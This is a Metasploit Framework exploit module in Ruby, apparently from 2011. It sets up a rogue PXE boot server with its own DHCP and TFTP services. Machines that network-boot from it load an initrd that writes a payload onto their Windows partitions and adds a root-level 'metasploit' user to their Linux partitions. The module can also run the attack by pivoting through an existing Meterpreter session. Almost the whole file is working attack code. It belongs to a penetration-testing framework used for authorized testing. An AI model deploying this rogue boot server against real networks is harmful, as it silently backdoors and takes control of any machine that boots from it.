##
# $Id: pxexploit.rb 13493 2011-08-05 17:10:27Z scriptjunkie $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex/proto/tftp'
require 'rex/proto/dhcp'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::TFTPServer

	def initialize
		super(
			'Name'        => 'PXE exploit server',
			'Version'     => '$Revision: 13493 $',
			'Description'    => %q{
				This module provides a PXE server, running a DHCP and TFTP server. 
				The default configuration loads a linux kernel and initrd into memory that 
				reads the hard drive; placing the payload on the hard drive of any Windows 
				partition seen, and add a uid 0 user with username and password metasploit to any 
				linux partition seen.
			},
			'Author'      => [ 'scriptjunkie' ],
			'License'     => MSF_LICENSE,
			'Version'        => '$Revision: 13493 $',
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'       => 4500,
					'DisableNops' => 'True',
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows Universal', 
						{ 
						}
					],
				],
			'Privileged'     => true,
			'Stance' => Msf::Exploit::Stance::Passive,
			'DefaultTarget'  => 0
		)

		register_options(
			[
				OptInt.new('SESSION',   [ false,  'A session to pivot the attack through' ])
			], self.class)

		register_advanced_options(
			[
				OptString.new('TFTPROOT',   [ false,  'The TFTP root directory to serve files from' ]),
				OptString.new('SRVHOST',   [ false,  'The IP of the DHCP server' ]),
				OptString.new('NETMASK',   [ false,  'The netmask of the local subnet', '255.255.255.0' ]),
				OptString.new('DHCPIPSTART',   [ false,  'The first IP to give out' ]),
				OptString.new('DHCPIPEND',   [ false,  'The last IP to give out' ])
			], self.class)
	end

	def exploit
		if not datastore['TFTPROOT']
			datastore['TFTPROOT'] = File.join(Msf::Config.data_directory, 'exploits', 'pxexploit')
		end
		datastore['FILENAME'] = "update1"
		datastore['SERVEONCE'] = true # once they reboot; don't infect again - you'll kill them!

		# Prepare payload
		print_status("Creating initrd")
		initrd = IO.read(File.join(Msf::Config.data_directory, 'exploits', 'pxexploit','updatecustom'))
		uncompressed = Rex::Text.ungzip(initrd)
		payl = payload.generate
		uncompressed[uncompressed.index('AAAAAAAAAAAAAAAAAAAAAA'),payl.length] = payl
		initrd = Rex::Text.gzip(uncompressed)

		# Meterpreter attack
		if framework.sessions.include? datastore['SESSION']
			client = framework.sessions[datastore['SESSION']]
			if not client.lanattacks
				print_status("Loading lanattacks extension...")
				client.core.use("lanattacks")
			end

			print_status("Loading DHCP options...")
			client.lanattacks.load_dhcp_options(datastore)
			1.upto(4) do |i|
				print_status("Loading file #{i} of 4")
				if i < 4
					contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
				else
					contents = initrd
				end
				client.lanattacks.add_tftp_file("update#{i}",contents)
			end
			print_status("Starting TFTP server...")
			client.lanattacks.start_tftp
			print_status("Starting DHCP server...")
			client.lanattacks.start_dhcp
			print_status("pxesploit attack started")
			return
		end

		# normal attack
		print_status("Starting TFTP server...")
		@tftp = Rex::Proto::TFTP::Server.new
		@tftp.set_tftproot(datastore['TFTPROOT'])
		@tftp.register_file('update4',initrd)
		@tftp.start

		print_status("Starting DHCP server...")
		@dhcp = Rex::Proto::DHCP::Server.new( datastore )
		@dhcp.start
		print_status("pxesploit attack started")

		# Wait for finish..
		@tftp.thread.join
		@dhcp.thread.join
		print_status("pxesploit attack completed")
	end

end
